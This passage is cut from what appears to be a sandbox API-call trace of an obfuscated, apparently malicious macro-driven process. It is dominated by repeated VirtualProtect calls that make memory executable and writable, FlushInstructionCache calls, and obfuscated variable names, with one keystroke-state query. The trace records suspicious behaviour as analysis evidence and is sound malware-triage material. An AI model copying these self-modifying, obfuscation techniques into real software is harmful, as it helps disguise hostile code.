dwSize=0x2) returned 1 [0114.529] GetCurrentProcess () returned 0xffffffff [0114.529] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.529] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.529] GetCurrentProcess () returned 0xffffffff [0114.529] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.529] GetCurrentProcess () returned 0xffffffff [0114.529] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.530] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.530] GetCurrentProcess () returned 0xffffffff [0114.530] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.530] GetCurrentProcess () returned 0xffffffff [0114.530] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.530] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.531] GetCurrentProcess () returned 0xffffffff [0114.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.531] GetCurrentProcess () returned 0xffffffff [0114.531] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.531] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.532] GetCurrentProcess () returned 0xffffffff [0114.532] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.532] GetCurrentProcess () returned 0xffffffff [0114.532] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.532] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.532] GetCurrentProcess () returned 0xffffffff [0114.532] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.532] GetCurrentProcess () returned 0xffffffff [0114.533] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.533] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.533] GetCurrentProcess () returned 0xffffffff [0114.533] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.533] GetCurrentProcess () returned 0xffffffff [0114.533] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.533] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.534] GetCurrentProcess () returned 0xffffffff [0114.534] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.534] GetCurrentProcess () returned 0xffffffff [0114.534] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.535] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.535] GetCurrentProcess () returned 0xffffffff [0114.535] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.535] GetCurrentProcess () returned 0xffffffff [0114.535] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.536] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.536] GetCurrentProcess () returned 0xffffffff [0114.536] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.537] GetAsyncKeyState (vKey=3) returned 0 [0114.538] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.538] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.538] CRetailMalloc_Alloc () returned 0xcaa36e8 [0114.538] memcpy (in: _Dst=0xb754f48, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.538] memcpy (in: _Dst=0xb754f4c, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.538] memcpy (in: _Dst=0xb754f4c, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.538] memcpy (in: _Dst=0xb754f4c, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.538] memcpy (in: _Dst=0xb754f50, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0114.538] memcpy (in: _Dst=0xb754f4c, _Src=0x197548, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.538] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x96\x97\x97\x96\x97\x96\x96\x96\x96\x96\x97\x97\x97\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x97\x97\x96\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96\x96\x97\x96", cchCount2=-1) returned 1 [0114.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302e26, cbMultiByte=23, lpWideCharStr=0x197348, cchWideChar=24 | out: lpWideCharStr="––—–——–—––———–—––—––—–") returned 23 [0114.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c016e, cbMultiByte=23, lpWideCharStr=0x1973a8, cchWideChar=24 | out: lpWideCharStr="––—–——–—––———–—––—––—–") returned 23 [0114.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c016e, cbMultiByte=23, lpWideCharStr=0x1973a8, cchWideChar=24 | out: lpWideCharStr="––—–——–—––———–—––—––—–") returned 23 [0114.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c016e, cbMultiByte=23, lpWideCharStr=0x1973a8, cchWideChar=24 | out: lpWideCharStr="––—–——–—––———–—––—––—–") returned 23 [0114.540] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x96\x96\x96\x97\x97\x96\x97\x96\x96\x96\x96\x96\x97\x97\x97\x97\x97\x97\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x96\x97\x97\x96\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x97\x96\x96\x97\x96", cchCount2=-1) returned 1 [0114.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c016e, cbMultiByte=23, lpWideCharStr=0x1973a8, cchWideChar=24 | out: lpWideCharStr="––—–——–—––———–—––—––—–") returned 23 [0114.540] CRetailMalloc_Alloc () returned 0xcb1f0f8 [0114.540] _mbscpy_s (in: _Dst=0xcb1f0f8, _DstSizeInBytes=0x17, _Src=0x112c016e | out: _Dst=0xcb1f0f8) returned 0x0 [0114.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0c16, cbMultiByte=30, lpWideCharStr=0x1973b8, cchWideChar=31 | out: lpWideCharStr="_B_var_––—–——–—––———–—––—––—–") returned 30 [0114.541] CRetailMalloc_Free () returned 0x1 [0114.541] _mbscpy_s (in: _Dst=0x1974d0, _DstSizeInBytes=0x17, _Src=0x112c01fa | out: _Dst=0x1974d0) returned 0x0 [0114.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb318308, cbMultiByte=8, lpWideCharStr=0x11460c9c, cchWideChar=18 | out: lpWideCharStr="rkITG6NQ") returned 8 [0114.541] memcpy (in: _Dst=0xcadadc8, _Src=0x11460c98, _Size=0x16 | out: _Dst=0xcadadc8) returned 0xcadadc8 [0114.541] memcpy (in: _Dst=0xb754f48, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.542] memcpy (in: _Dst=0xb754f48, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb31831a, cbMultiByte=9, lpWideCharStr=0x1146104e, cchWideChar=20 | out: lpWideCharStr="uhhlGnSxq") returned 9 [0114.542] memcpy (in: _Dst=0xcadade4, _Src=0x1146104a, _Size=0x18 | out: _Dst=0xcadade4) returned 0xcadade4 [0114.542] memcpy (in: _Dst=0xb754f4c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.542] memcpy (in: _Dst=0xb754f4c, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.542] memcpy (in: _Dst=0xb754f48, _Src=0x197548, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.542] memcpy (in: _Dst=0xb754f48, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.542] memcpy (in: _Dst=0xb754f4c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.542] memcpy (in: _Dst=0xb754f50, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0114.542] memcpy (in: _Dst=0xb754f50, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0114.543] memcpy (in: _Dst=0xb754f50, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0114.543] memcpy (in: _Dst=0xb754f54, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb754f54) returned 0xb754f54 [0114.543] memcpy (in: _Dst=0xb754f50, _Src=0x197548, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0114.543] memcpy (in: _Dst=0xb754f54, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb754f54) returned 0xb754f54 [0114.543] memcpy (in: _Dst=0xb755050, _Src=0x19754c, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0114.543] memcpy (in: _Dst=0xb754f48, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.543] memcpy (in: _Dst=0xb754f4c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.543] memcpy (in: _Dst=0xb754f48, _Src=0x197548, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.543] memcpy (in: _Dst=0xb754f48, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.543] memcpy (in: _Dst=0xb754f4c, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.543] memcpy (in: _Dst=0xb754f50, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0114.543] memcpy (in: _Dst=0xb754f54, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f54) returned 0xb754f54 [0114.543] memcpy (in: _Dst=0xb754f50, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0114.543] memcpy (in: _Dst=0xb754f4c, _Src=0x197548, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.543] memcpy (in: _Dst=0xb754f50, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0114.543] memcpy (in: _Dst=0xb754f54, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f54) returned 0xb754f54 [0114.543] memcpy (in: _Dst=0xb754f58, _Src=0x19759c, _Size=0x4 | out: _Dst=0xb754f58) returned 0xb754f58 [0114.543] memcpy (in: _Dst=0xb754f54, _Src=0x197548, _Size=0x4 | out: _Dst=0xb754f54) returned 0xb754f54 [0114.544] memcpy (in: _Dst=0xb754f50, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0114.544] memcpy (in: _Dst=0xb754f4c, _Src=0x197548, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.544] memcpy (in: _Dst=0xb754f4c, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.544] memcpy (in: _Dst=0xb754f4c, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.544] memcpy (in: _Dst=0xb754f48, _Src=0x197548, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.544] memcpy (in: _Dst=0xb754f4c, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.544] memcpy (in: _Dst=0xb754f48, _Src=0x197568, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.545] memcpy (in: _Dst=0xcaa37af, _Src=0x1974fc, _Size=0x1 | out: _Dst=0xcaa37af) returned 0xcaa37af [0114.545] memcpy (in: _Dst=0xcaa3848, _Src=0x197604, _Size=0x18 | out: _Dst=0xcaa3848) returned 0xcaa3848 [0114.545] CRetailMalloc_Realloc () returned 0xcaa36e8 [0114.545] CRetailMalloc_Free () returned 0x1 [0114.545] GetCurrentProcess () returned 0xffffffff [0114.545] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.545] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.546] GetCurrentProcess () returned 0xffffffff [0114.546] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.546] GetCurrentProcess () returned 0xffffffff [0114.546] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.546] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.547] GetCurrentProcess () returned 0xffffffff [0114.547] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.547] GetCurrentProcess () returned 0xffffffff [0114.548] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.548] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.548] GetCurrentProcess () returned 0xffffffff [0114.548] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.548] GetCurrentProcess () returned 0xffffffff [0114.548] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.548] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.549] GetCurrentProcess () returned 0xffffffff [0114.549] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.549] GetCurrentProcess () returned 0xffffffff [0114.549] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.549] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.550] GetCurrentProcess () returned 0xffffffff [0114.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.550] GetCurrentProcess () returned 0xffffffff [0114.550] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.550] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.551] GetCurrentProcess () returned 0xffffffff [0114.551] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.551] GetCurrentProcess () returned 0xffffffff [0114.551] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.551] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.552] GetCurrentProcess () returned 0xffffffff [0114.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.552] GetCurrentProcess () returned 0xffffffff [0114.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.552] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.552] GetCurrentProcess () returned 0xffffffff [0114.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.552] GetCurrentProcess () returned 0xffffffff [0114.552] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.552] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.553] GetCurrentProcess () returned 0xffffffff [0114.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.553] GetCurrentProcess () returned 0xffffffff [0114.553] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.553] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.554] GetCurrentProcess () returned 0xffffffff [0114.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.554] GetCurrentProcess () returned 0xffffffff [0114.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.554] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.554] GetCurrentProcess () returned 0xffffffff [0114.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.554] GetCurrentProcess () returned 0xffffffff [0114.554] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.555] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.555] GetCurrentProcess () returned 0xffffffff [0114.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.555] GetCurrentProcess () returned 0xffffffff [0114.555] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.555] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.556] GetCurrentProcess () returned 0xffffffff [0114.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.556] GetCurrentProcess () returned 0xffffffff [0114.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.556] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.556] GetCurrentProcess () returned 0xffffffff [0114.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.556] GetCurrentProcess () returned 0xffffffff [0114.556] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.557] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.557] GetCurrentProcess () returned 0xffffffff [0114.557] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.557] GetCurrentProcess () returned 0xffffffff [0114.557] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.557] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.558] GetCurrentProcess () returned 0xffffffff [0114.558] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.558] GetCurrentProcess () returned 0xffffffff [0114.558] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.558] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.558] GetCurrentProcess () returned 0xffffffff [0114.559] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.559] GetCurrentProcess () returned 0xffffffff [0114.559] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.559] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.559] GetCurrentProcess () returned 0xffffffff [0114.559] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.559] GetCurrentProcess () returned 0xffffffff [0114.559] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.559] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.560] GetCurrentProcess () returned 0xffffffff [0114.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.560] GetCurrentProcess () returned 0xffffffff [0114.560] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.560] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.561] GetCurrentProcess () returned 0xffffffff [0114.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.561] GetCurrentProcess () returned 0xffffffff [0114.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.561] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.561] GetCurrentProcess () returned 0xffffffff [0114.561] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.561] GetCurrentProcess () returned 0xffffffff [0114.562] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.562] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.563] GetCurrentProcess () returned 0xffffffff [0114.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.563] GetCurrentProcess () returned 0xffffffff [0114.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.563] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.563] GetCurrentProcess () returned 0xffffffff [0114.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.563] GetCurrentProcess () returned 0xffffffff [0114.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.563] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.564] GetCurrentProcess () returned 0xffffffff [0114.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.564] GetCurrentProcess () returned 0xffffffff [0114.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.564] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.565] GetCurrentProcess () returned 0xffffffff [0114.565] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.568] GetCurrentProcess () returned 0xffffffff [0114.568] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.568] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.568] GetCurrentProcess () returned 0xffffffff [0114.568] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.568] GetCurrentProcess () returned 0xffffffff [0114.568] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.569] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.569] GetCurrentProcess () returned 0xffffffff [0114.569] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.569] GetCurrentProcess () returned 0xffffffff [0114.569] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.570] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.570] GetCurrentProcess () returned 0xffffffff [0114.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.570] GetCurrentProcess () returned 0xffffffff [0114.570] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.570] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.571] GetCurrentProcess () returned 0xffffffff [0114.571] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.571] GetCurrentProcess () returned 0xffffffff [0114.571] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.571] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.572] GetCurrentProcess () returned 0xffffffff [0114.572] FlushInstructionCache (hProcess=0xffffffff, 